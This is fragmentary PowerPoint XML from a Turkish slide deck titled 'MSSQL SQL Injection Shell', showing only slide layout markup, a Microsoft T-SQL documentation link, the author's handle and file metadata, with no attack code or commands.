            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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162" y="829627"/>
            <a:ext cx="82677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5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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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2000" y="1342163"/>
            <a:ext cx="10637520" cy="499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 smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15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348" y="1044892"/>
            <a:ext cx="8162925" cy="2695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4297" y="1448480"/>
            <a:ext cx="82010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94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380</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>153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MSSQL SQL INJECTION SHELL</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR</vt:lpstr>
      <vt:lpstr>SQL INJECTION VE SHELL / CLR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INJECTION VE SHELL</dc:title>
  <dc:creator>lab</dc:creator>
  <cp:lastModifiedBy>lab</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-24T19:41:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-24T23:05:39Z</dcterms:modified>
</cp:coreProperties>
</file>